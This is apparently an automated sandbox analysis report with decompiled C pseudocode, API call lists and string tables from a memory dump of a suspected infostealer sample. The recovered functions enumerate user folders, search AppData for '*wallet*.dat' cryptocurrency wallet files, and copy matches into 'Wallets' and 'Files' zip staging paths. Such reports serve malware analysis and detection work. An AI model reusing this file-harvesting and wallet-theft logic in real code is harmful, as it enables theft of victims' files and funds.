                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EE6
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411EF9
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F07
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411F1A
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F28
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411F3B
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F55
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F6B
                                                                    • lstrcatA.KERNEL32(?), ref: 00411F94
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411FA2
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411FB6
                                                                    • _memset.LIBCMT ref: 00411FC6
                                                                    • lstrcatA.KERNEL32(?), ref: 00411FDB
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00411FF1
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00412007
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00412022
                                                                    • DeleteFileA.KERNEL32(?,000003E8,00000000,?), ref: 00412050
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00412063
                                                                    • FindClose.KERNEL32(?), ref: 00412077
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$Find_memset$CloseCopyDeleteFirstNextUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                    • String ID: %s\%s$%s\%s\%s\%s$%s\*
                                                                    • API String ID: 676975003-3933763253
                                                                    • Opcode ID: 622764a1bb231c85d10f08ec52cd615b4dac76b767b50ca0dfd3b657b7b0f6dd
                                                                    • Instruction ID: cf667f2677a2d0d00ce50c166746809aaceeb30a4323bd9a0a3e476e31e91472
                                                                    • Opcode Fuzzy Hash: 622764a1bb231c85d10f08ec52cd615b4dac76b767b50ca0dfd3b657b7b0f6dd
                                                                    • Instruction Fuzzy Hash: C581ECB690011DAFCF109FA0EC49ECEBB7CAB0A755F1104A6F609E2150D734DA89CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 35%
                                                                    			E00409ADF(CHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                    				signed int _v12;
                                                                    				char _v120;
                                                                    				char _v1120;
                                                                    				char _v2120;
                                                                    				char _v3120;
                                                                    				char _v3124;
                                                                    				intOrPtr* _v3128;
                                                                    				intOrPtr _v3132;
                                                                    				intOrPtr _v3136;
                                                                    				char _v3140;
                                                                    				char _v3144;
                                                                    				char _v3148;
                                                                    				intOrPtr _v3152;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t73;
                                                                    				char* _t78;
                                                                    				char* _t79;
                                                                    				char* _t80;
                                                                    				void* _t125;
                                                                    				signed int _t132;
                                                                    				signed int _t140;
                                                                    				void* _t141;
                                                                    				int _t146;
                                                                    				void* _t151;
                                                                    				void* _t162;
                                                                    				void* _t186;
                                                                    				void* _t194;
                                                                    				void* _t195;
                                                                    				CHAR* _t196;
                                                                    				signed int _t201;
                                                                    				void* _t203;
                                                                    				intOrPtr* _t204;
                                                                    				CHAR* _t205;
                                                                    				signed int _t206;
                                                                    				void* _t207;
                                                                    
                                                                    				_t73 =  *0x443674; // 0x393162b1
                                                                    				_v12 = _t73 ^ _t206;
                                                                    				_v3132 = _a8;
                                                                    				_v3136 = _a16;
                                                                    				_t196 = __ecx;
                                                                    				_t162 = 0x3e8;
                                                                    				_t203 = __edx;
                                                                    				_v3152 = _a20;
                                                                    				_t194 = 0x3e8;
                                                                    				_t78 =  &_v3120;
                                                                    				do {
                                                                    					 *_t78 = 0;
                                                                    					_t78 = _t78 + 1;
                                                                    					_t194 = _t194 - 1;
                                                                    				} while (_t194 != 0);
                                                                    				_t195 = 0x3e8;
                                                                    				_t79 =  &_v1120;
                                                                    				do {
                                                                    					 *_t79 = 0;
                                                                    					_t79 = _t79 + 1;
                                                                    					_t195 = _t195 - 1;
                                                                    				} while (_t195 != 0);
                                                                    				_t80 =  &_v2120;
                                                                    				do {
                                                                    					 *_t80 = 0;
                                                                    					_t80 = _t80 + 1;
                                                                    					_t162 = _t162 - 1;
                                                                    					_t212 = _t162;
                                                                    				} while (_t162 != 0);
                                                                    				lstrcatA( &_v3120, "\\Files\\");
                                                                    				lstrcatA( &_v3120, _t196);
                                                                    				lstrcatA( &_v3120, ".zip");
                                                                    				_v3128 = E0041CDBD(0, _t196, _t203, _t206, _t212);
                                                                    				_v3124 = 0;
                                                                    				_v3140 = 0;
                                                                    				 *0x4464d4( &_v1120, E00415E43(_t203, "%APPDATA%"), E00416617(0, _t196, _t203, 0x1a));
                                                                    				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%LOCALAPPDATA%"), E00416617(0, _t196, _t203, 0x1c));
                                                                    				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%USERPROFILE%"), E00416617(0, _t196, _t203, 0x28));
                                                                    				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%DESKTOP%"), E00416617(0, _t196, _t203, 0x10));
                                                                    				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%DOCUMENTS%"), E00416617(0, _t196, _t203, 5));
                                                                    				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%PROGRAMFILES%"), E00416617(0, _t196, _t203, 0x26));
                                                                    				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%PROGRAMFILES_86%"), E00416617(0, _t196, _t203, 0x2a));
                                                                    				_push(E00416617(0, _t196, _t203, 8));
                                                                    				_t125 = E00415E43( &_v1120, "%RECENT%");
                                                                    				_pop(_t186);
                                                                    				 *0x4464d4( &_v1120, _t125);
                                                                    				_push(0);
                                                                    				_push("*%DRIVE_FIXED%*");
                                                                    				_push( &_v1120);
                                                                    				if( *0x446398() != 0) {
                                                                    					_v3124 = 1;
                                                                    				}
                                                                    				_push(0);
                                                                    				_push("*%DRIVE_REMOVABLE%*");
                                                                    				_push( &_v1120);
                                                                    				if( *0x446398() != 0) {
                                                                    					_v3124 = 1;
                                                                    					_v3140 = 1;
                                                                    				}
                                                                    				_t132 =  *0x446398(_t203, "*%RECENT%*", 0);
                                                                    				asm("sbb edi, edi");
                                                                    				_t201 =  ~( ~_t132);
                                                                    				if(_v3124 == 0) {
                                                                    					E00409A8B(0, _t186, _t201, __eflags, _v3132,  &_v1120, _v3128, _a12, _a4, _v3136, 0, _t201);
                                                                    					_t207 = _t207 + 0x20;
                                                                    				} else {
                                                                    					GetLogicalDriveStringsA(0x64,  &_v120);
                                                                    					_t205 =  &_v120;
                                                                    					if(_v120 != 0) {
                                                                    						do {
                                                                    							_t146 = GetDriveTypeA(_t205);
                                                                    							if(_v3140 == 0) {
                                                                    								L15:
                                                                    								 *0x4464d4( &_v2120,  &_v1120);
                                                                    								_push(_t205);
                                                                    								_push("%DRIVE_FIXED%");
                                                                    							} else {
                                                                    								_t218 = _t146 - 2;
                                                                    								if(_t146 != 2) {
                                                                    									goto L15;
                                                                    								} else {
                                                                    									 *0x4464d4( &_v2120,  &_v1120);
                                                                    									_push(_t205);
                                                                    									_push("%DRIVE_REMOVABLE%");
                                                                    								}
                                                                    							}
                                                                    							_t151 = E00415E43( &_v2120);
                                                                    							_pop(_t186);
                                                                    							 *0x4464d4( &_v2120, _t151);
                                                                    							E00409A8B(0, _t186, _t201, _t218, _v3132,  &_v2120, _v3128, _a12, _a4, _v3136, _v3124, _t201);
                                                                    							_t207 = _t207 + 0x20;
                                                                    							_t205 =  &(_t205[ *0x446320(_t205) + 1]);
                                                                    						} while ( *_t205 != 0);
                                                                    					}
                                                                    				}
                                                                    				_t204 = _v3128;
                                                                    				_t202 =  &_v3148;
                                                                    				E0041CED3(_t204, _t186,  &_v3148,  &_v3144);
                                                                    				_t140 = E0041CE7C(_v3152,  &_v3120, _v3144, 3);
                                                                    				if(_t204 == 0 || (_t140 & 0xffffff00 |  *_t204 == 0x00000001) == 0) {
                                                                    					_t202 = _t204;
                                                                    					_t141 = E0041CF3E(_t204);
                                                                    				} else {
                                                                    					_t141 = E00408318(_t204, _t204);
                                                                    				}
                                                                    				return E0041DA9B(_t141, 0, _v12 ^ _t206, _t195, _t202, _t204);
                                                                    			}
                                                                    0x00409d24
                                                                    0x00409d26
                                                                    0x00409d2e
                                                                    0x00409e15
                                                                    0x00409e1a
                                                                    0x00409d34
                                                                    0x00409d3a
                                                                    0x00409d40
                                                                    0x00409d46
                                                                    0x00409d4c
                                                                    0x00409d4d
                                                                    0x00409d59
                                                                    0x00409d7c
                                                                    0x00409d8a
                                                                    0x00409d90
                                                                    0x00409d91
                                                                    0x00409d5b
                                                                    0x00409d5b
                                                                    0x00409d5e
                                                                    0x00000000
                                                                    0x00409d60
                                                                    0x00409d6e
                                                                    0x00409d74
                                                                    0x00409d75
                                                                    0x00409d75
                                                                    0x00409d5e
                                                                    0x00409d9c
                                                                    0x00409da2
                                                                    0x00409dab
                                                                    0x00409dd7
                                                                    0x00409ddc
                                                                    0x00409de6
                                                                    0x00409dea
                                                                    0x00409df2
                                                                    0x00409d46
                                                                    0x00409e1d
                                                                    0x00409e2a
                                                                    0x00409e32
                                                                    0x00409e53
                                                                    0x00409e5d
                                                                    0x00409e72
                                                                    0x00409e74
                                                                    0x00409e69
                                                                    0x00409e6a
                                                                    0x00409e6f
                                                                    0x00409e87

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?,\Files\), ref: 00409B4F
                                                                    • lstrcatA.KERNEL32(?), ref: 00409B5D
                                                                    • lstrcatA.KERNEL32(?,.zip), ref: 00409B6F
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409BAB
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409BD4
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409BFD
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409C26
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409C4F
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409C78
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                      • Part of subcall function 00415E43: StrStrA.SHLWAPI(?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E4C
                                                                      • Part of subcall function 00415E43: lstrcpyn.KERNEL32(00446738,?,00000000,?,?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E65
                                                                      • Part of subcall function 00415E43: wsprintfA.USER32 ref: 00415E91
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409CA1
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409CCA
                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00409D3A
                                                                    • GetDriveTypeA.KERNEL32(?,?,*%RECENT%*,00000000), ref: 00409D4D
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00409D6E
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00409D8A
                                                                      • Part of subcall function 00409A8B: _strtok_s.LIBCMT ref: 00409A9D
                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00409DAB
                                                                    • lstrlen.KERNEL32(?,?,?,*%RECENT%*,00000000), ref: 00409DE0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$lstrcat$Drive$FolderLogicalPathStringsType_memset_strtok_slstrcpynlstrlenwsprintf
                                                                    • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip$\Files\
                                                                    • API String ID: 1204426253-175588422
                                                                    • Opcode ID: 5c59b50aa2487a3c505819ff58e6b0f6e514b940e7d510e51a5cd5a90db8f4c6
                                                                    • Instruction ID: 21c95b79e929c0167f989c4314e32640226bd38830f19e0ff31c6e1aa12e6311
                                                                    • Opcode Fuzzy Hash: 5c59b50aa2487a3c505819ff58e6b0f6e514b940e7d510e51a5cd5a90db8f4c6
                                                                    • Instruction Fuzzy Hash: 65A17272900218AFEB15DBA1DC85EDEB7BCEB49310F1041ABF509A2181EF346F848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 63%
                                                                    			E0040C955(CHAR* __ecx, void* __edx, void* __esi, CHAR* _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v804;
                                                                    				char _v1068;
                                                                    				struct _WIN32_FIND_DATAA _v1388;
                                                                    				CHAR* _v1392;
                                                                    				void* _v1396;
                                                                    				CHAR* _v1400;
                                                                    				intOrPtr _v1404;
                                                                    				CHAR* _v1408;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed int _t49;
                                                                    				char* _t54;
                                                                    				CHAR* _t59;
                                                                    				int _t63;
                                                                    				signed char _t76;
                                                                    				char* _t77;
                                                                    				void* _t99;
                                                                    				void* _t103;
                                                                    				void* _t105;
                                                                    				CHAR* _t106;
                                                                    				signed int _t108;
                                                                    				void* _t109;
                                                                    				void* _t110;
                                                                    
                                                                    				_t107 = __esi;
                                                                    				_t105 = __edx;
                                                                    				_t49 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t49 ^ _t108;
                                                                    				_v1408 = _a4;
                                                                    				_v1400 = _a8;
                                                                    				_t106 = __ecx;
                                                                    				_v1404 = _a12;
                                                                    				_v1392 = __ecx;
                                                                    				_t99 = 0x104;
                                                                    				_t54 =  &_v540;
                                                                    				do {
                                                                    					 *_t54 = 0;
                                                                    					_t54 = _t54 + 1;
                                                                    					_t99 = _t99 - 1;
                                                                    				} while (_t99 != 0);
                                                                    				lstrcatA( &_v540, E00416617(0, __ecx, __esi, 0x1a));
                                                                    				_push(_t106);
                                                                    				_push( &_v540);
                                                                    				_t59 =  &_v1068;
                                                                    				if(_a16 == 0) {
                                                                    					_push("%s\\%s\\*wallet*.dat");
                                                                    				} else {
                                                                    					_push("%s\\%s\\*");
                                                                    				}
                                                                    				wsprintfA(_t59, ??);
                                                                    				_t110 = _t109 + 0x10;
                                                                    				_t63 = FindFirstFileA( &_v1068,  &_v1388);
                                                                    				_v1396 = _t63;
                                                                    				if(_t63 != 0xffffffff) {
                                                                    					_t106 = 0x43c8e0;
                                                                    					do {
                                                                    						_push(".");
                                                                    						_push( &(_v1388.cFileName));
                                                                    						if( *0x446458() != 0) {
                                                                    							_push("..");
                                                                    							_push( &(_v1388.cFileName));
                                                                    							if( *0x446458() != 0) {
                                                                    								if(_a16 == 0) {
                                                                    									wsprintfA( &_v804, "%s\\%s\\%s",  &_v540, _v1392,  &(_v1388.cFileName));
                                                                    									_t110 = _t110 + 0x14;
                                                                    								} else {
                                                                    									wsprintfA( &_v804, "%s\\%s\\%s\\%s",  &_v540, _v1392,  &(_v1388.cFileName), _v1400);
                                                                    									_t110 = _t110 + 0x18;
                                                                    								}
                                                                    								_t76 = GetFileAttributesA( &_v804);
                                                                    								if(_t76 != 0xffffffff && (_t76 & 0x00000010) == 0) {
                                                                    									_t103 = 0x104;
                                                                    									_t77 =  &_v276;
                                                                    									do {
                                                                    										 *_t77 = 0;
                                                                    										_t77 = _t77 + 1;
                                                                    										_t103 = _t103 - 1;
                                                                    									} while (_t103 != 0);
                                                                    									lstrcatA( &_v276, "\\Wallets\\");
                                                                    									lstrcatA( &_v276, _v1408);
                                                                    									lstrcatA( &_v276, _t106);
                                                                    									lstrcatA( &_v276,  &(_v1388.cFileName));
                                                                    									if(_a16 != 0) {
                                                                    										lstrcatA( &_v276, _t106);
                                                                    										lstrcatA( &_v276, _v1400);
                                                                    									}
                                                                    									E0041CE7C(_v1404,  &_v276, 0, 2);
                                                                    									_t110 = _t110 + 0xc;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} while (FindNextFileA(_v1396,  &_v1388) != 0);
                                                                    					_t63 = FindClose(_v1396);
                                                                    				}
                                                                    				return E0041DA9B(_t63, 0, _v8 ^ _t108, _t105, _t106, _t107);
                                                                    			}

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?,00000000,0043C8D8,00000000), ref: 0040C9B0
                                                                    • wsprintfA.USER32 ref: 0040C9D6
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040C9ED
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 0040CA13
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0040CA2D
                                                                    • wsprintfA.USER32 ref: 0040CA66
                                                                    • wsprintfA.USER32 ref: 0040CA8B
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0040CA9B
                                                                    • lstrcatA.KERNEL32(?,\Wallets\), ref: 0040CACF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040CAE2
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040CAF0
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040CB04
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040CB17
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040CB2A
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0040CB5B
                                                                    • FindClose.KERNEL32(?), ref: 0040CB6F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileFindwsprintf$AttributesCloseFirstNext
                                                                    • String ID: %s\%s\%s$%s\%s\%s\%s$%s\%s\*$%s\%s\*wallet*.dat$\Bitcoin\wallets\$\Wallets\
                                                                    • API String ID: 1844104990-3932732945
                                                                    • Opcode ID: cfc2154e3ba82c94969940e75d31b676d302d60417567deeec0d77c9a0d8ffbd
                                                                    • Instruction ID: c730f20c59e2f6996738c63aaf29f5c539468badf739dfc3d46299cfe8c5801a
                                                                    • Opcode Fuzzy Hash: cfc2154e3ba82c94969940e75d31b676d302d60417567deeec0d77c9a0d8ffbd
                                                                    • Instruction Fuzzy Hash: 2E512D71D0011CAFCF21DFA4DC89EDABBBCBB09311F4005A6E519E2190DB349A898F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 63%
                                                                    			E00408B15(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t35;
                                                                    				void* _t47;
                                                                    				intOrPtr _t49;
                                                                    				char* _t56;
                                                                    				void* _t59;
                                                                    				intOrPtr _t75;
                                                                    				void* _t80;
                                                                    				intOrPtr _t82;
                                                                    				void* _t83;
                                                                    				void* _t84;
                                                                    				void* _t85;
                                                                    
                                                                    				_push(0x570);
                                                                    				E0042083E(E00434B70, __ebx, __edi, __esi);
                                                                    				_t82 = __ecx;
                                                                    				 *((intOrPtr*)(_t83 - 0x578)) = __ecx;
                                                                    				 *((intOrPtr*)(_t83 - 4)) = 0;
                                                                    				_t80 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
                                                                    				 *((intOrPtr*)(_t83 - 0x57c)) = _t80;
                                                                    				wsprintfA(_t83 - 0x328, "%s\\*", _t82);
                                                                    				_t85 = _t84 + 0xc;
                                                                    				_t35 = FindFirstFileA(_t83 - 0x328, _t83 - 0x570);
                                                                    				 *(_t83 - 0x574) = _t35;
                                                                    				if(_t35 != 0xffffffff) {
                                                                    					_t82 = 0x104;
                                                                    					do {
                                                                    						_push(".");
                                                                    						_push(_t83 - 0x544);
                                                                    						if( *0x446458() != 0) {
                                                                    							_push("..");
                                                                    							_push(_t83 - 0x544);
                                                                    							if( *0x446458() != 0) {
                                                                    								wsprintfA(_t83 - 0x430, "%s\\%s",  *((intOrPtr*)(_t83 - 0x578)), _t83 - 0x544);
                                                                    								_t85 = _t85 + 0x10;
                                                                    								_t75 = _t82;
                                                                    								_t56 = _t83 - 0x118;
                                                                    								do {
                                                                    									 *_t56 = 0;
                                                                    									_t56 = _t56 + 1;
                                                                    									_t75 = _t75 - 1;
                                                                    									_t92 = _t75;
                                                                    								} while (_t75 != 0);
                                                                    								lstrcatA(_t83 - 0x118,  *0x445fe0);
                                                                    								_t59 = 0x1a;
                                                                    								lstrcatA(_t83 - 0x118, E00415EF6(_t59, _t92));
                                                                    								CopyFileA(_t83 - 0x430, _t83 - 0x118, 1);
                                                                    								_push(_t80);
                                                                    								_push(_t83 - 0x118);
                                                                    								E0040878A(0, _t80, _t82, _t92);
                                                                    								DeleteFileA(_t83 - 0x118);
                                                                    							}
                                                                    						}
                                                                    					} while (FindNextFileA( *(_t83 - 0x574), _t83 - 0x570) != 0);
                                                                    					FindClose( *(_t83 - 0x574));
                                                                    					E00426300(_t83 - 0x220, 0, _t82);
                                                                    					lstrcatA(_t83 - 0x220,  *0x446198);
                                                                    					_t47 =  *0x446320(_t80);
                                                                    					_t49 =  *0x4461f0; // 0x0
                                                                    					E0041CE7C(_t49, _t83 - 0x220, _t47, 3);
                                                                    				}
                                                                    				E00404354(_t83 + 8, 1, 0);
                                                                    				return E00420888(0, _t80, _t82);
                                                                    			}















                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00408B1F
                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,00000570,00408FA7,?), ref: 00408B37
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00408B3E
                                                                    • wsprintfA.USER32 ref: 00408B59
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00408B70
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00408B96
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00408BB0
                                                                    • wsprintfA.USER32 ref: 00408BD7
                                                                    • lstrcatA.KERNEL32(?), ref: 00408BFB
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00408C11
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00408C27
                                                                    • DeleteFileA.KERNEL32(?), ref: 00408C43
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00408C56
                                                                    • FindClose.KERNEL32(?), ref: 00408C6A
                                                                    • _memset.LIBCMT ref: 00408C79
                                                                    • lstrcatA.KERNEL32(?), ref: 00408C8E
                                                                    • lstrlen.KERNEL32(00000000), ref: 00408C95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Findlstrcat$Heapwsprintf$AllocCloseCopyDeleteFirstH_prolog3_NextProcess_memsetlstrlen
                                                                    • String ID: %s\%s$%s\*
                                                                    • API String ID: 1287371050-2848263008
                                                                    • Opcode ID: 1ae9ea9de5455d4ad3dbb689f750792ff62452196413e4dfcd83fc00011786b8
                                                                    • Instruction ID: 0219aadeec5eea91d065dd2822f6c54c25061509eaa94e994f3012464786fefd
                                                                    • Opcode Fuzzy Hash: 1ae9ea9de5455d4ad3dbb689f750792ff62452196413e4dfcd83fc00011786b8
                                                                    • Instruction Fuzzy Hash: B44133B5900118AFDF10ABA0EC49EDB777CFB0A755F0400AAF509E2191DB349A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E004101E9(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v804;
                                                                    				struct _WIN32_FIND_DATAA _v1124;
                                                                    				intOrPtr _v1128;
                                                                    				intOrPtr _v1132;
                                                                    				intOrPtr _v1136;
                                                                    				intOrPtr _v1140;
                                                                    				intOrPtr _v1144;
                                                                    				void* _v1148;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t64;
                                                                    				intOrPtr _t67;
                                                                    				int _t72;
                                                                    				void* _t89;
                                                                    				signed char _t93;
                                                                    				signed int _t95;
                                                                    				signed int _t97;
                                                                    				intOrPtr _t104;
                                                                    				char* _t107;
                                                                    				char* _t120;
                                                                    				intOrPtr _t123;
                                                                    				intOrPtr _t124;
                                                                    				signed int _t125;
                                                                    				void* _t126;
                                                                    				void* _t127;
                                                                    
                                                                    				_t122 = __edx;
                                                                    				_t64 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t64 ^ _t125;
                                                                    				_t110 = _a16;
                                                                    				_t124 = _a12;
                                                                    				_t123 = _a24;
                                                                    				_v1136 = _a4;
                                                                    				_t67 = _a8;
                                                                    				_v1144 = _t67;
                                                                    				_v1132 = __ecx;
                                                                    				_v1140 = _a16;
                                                                    				_v1128 = _a20;
                                                                    				wsprintfA( &_v804, "%s\\*", _t67);
                                                                    				_t127 = _t126 + 0xc;
                                                                    				_t72 = FindFirstFileA( &_v804,  &_v1124);
                                                                    				_v1148 = _t72;
                                                                    				if(_t72 != 0xffffffff) {
                                                                    					do {
                                                                    						_push(".");
                                                                    						_push( &(_v1124.cFileName));
                                                                    						if( *0x446458() != 0) {
                                                                    							_push("..");
                                                                    							_push( &(_v1124.cFileName));
                                                                    							if( *0x446458() != 0) {
                                                                    								E0041EE84( &_v276, "%s\\%s", _v1144);
                                                                    								E00426300( &_v540, 0, 0x104);
                                                                    								wsprintfA( &_v540, "%s\\%s\\%s\\%s", _v1144,  &(_v1124.cFileName),  *0x446044,  *0x445a80);
                                                                    								_t127 = _t127 + 0x34;
                                                                    								_t89 =  *0x446458( &(_v1124.cFileName),  *0x445cc0,  &(_v1124.cFileName));
                                                                    								_t132 = _t89;
                                                                    								if(_t89 != 0) {
                                                                    									__eflags =  *0x446458( &(_v1124.cFileName),  *0x445a80);
                                                                    									if(__eflags != 0) {
                                                                    										_t93 = GetFileAttributesA( &_v540);
                                                                    										__eflags = _t93 - 0xffffffff;
                                                                    										if(_t93 == 0xffffffff) {
                                                                    											L11:
                                                                    											_t95 =  *0x446458( &(_v1124.cFileName),  *0x445d50);
                                                                    											__eflags = _t95;
                                                                    											if(_t95 != 0) {
                                                                    												_t97 =  *0x446458( &(_v1124.cFileName),  *0x445b04);
                                                                    												__eflags = _t97;
                                                                    												if(_t97 != 0) {
                                                                    													__eflags = _v1124.dwFileAttributes & 0x00000010;
                                                                    													if((_v1124.dwFileAttributes & 0x00000010) != 0) {
                                                                    														goto L19;
                                                                    													}
                                                                    												} else {
                                                                    													__eflags =  *((char*)(_v1132 + 1));
                                                                    													if(__eflags != 0) {
                                                                    														E0040F094(_t110,  &_v276, _t123, _t124, __eflags, _v1136, _t124, _t110, _v1128, _t123);
                                                                    														E0040F346( &_v276, _v1136, _t124, _t123);
                                                                    														goto L14;
                                                                    													}
                                                                    													goto L19;
                                                                    												}
                                                                    											} else {
                                                                    												_t104 = _v1132;
                                                                    												__eflags =  *((char*)(_t104 + 2));
                                                                    												if( *((char*)(_t104 + 2)) != 0) {
                                                                    													E0040F505( &_v276, _v1136, _t124, _t123);
                                                                    													E0040F6A9( &_v276, _v1136, _t124, _t123);
                                                                    													L14:
                                                                    													_t110 = _v1140;
                                                                    												}
                                                                    												goto L19;
                                                                    											}
                                                                    										} else {
                                                                    											__eflags = _t93 & 0x00000010;
                                                                    											if(__eflags != 0) {
                                                                    												goto L11;
                                                                    											} else {
                                                                    												_t107 =  &_v540;
                                                                    												_t120 =  &(_v1124.cFileName);
                                                                    												goto L7;
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										_t120 = _v1136;
                                                                    										_t107 =  &_v276;
                                                                    										L7:
                                                                    										_t122 = _t124;
                                                                    										E0040EC59(_t110, _t120, _t124, _t123, _t124, __eflags, _t107, _t110, _v1128, _t123);
                                                                    										goto L19;
                                                                    									}
                                                                    								} else {
                                                                    									E0040E9B8(_t110,  &_v276, _t123, _t124, _t132, _t124, _t110, _v1128);
                                                                    									L19:
                                                                    									E004101E9(_v1132, _t122,  &(_v1124.cFileName),  &_v276, _t124, _t110, _v1128, _t123);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} while (FindNextFileA(_v1148,  &_v1124) != 0);
                                                                    					_t72 = FindClose(_v1148);
                                                                    				}
                                                                    				return E0041DA9B(_t72, _t110, _v8 ^ _t125, _t122, _t123, _t124);
                                                                    			}


































                                                                    APIs
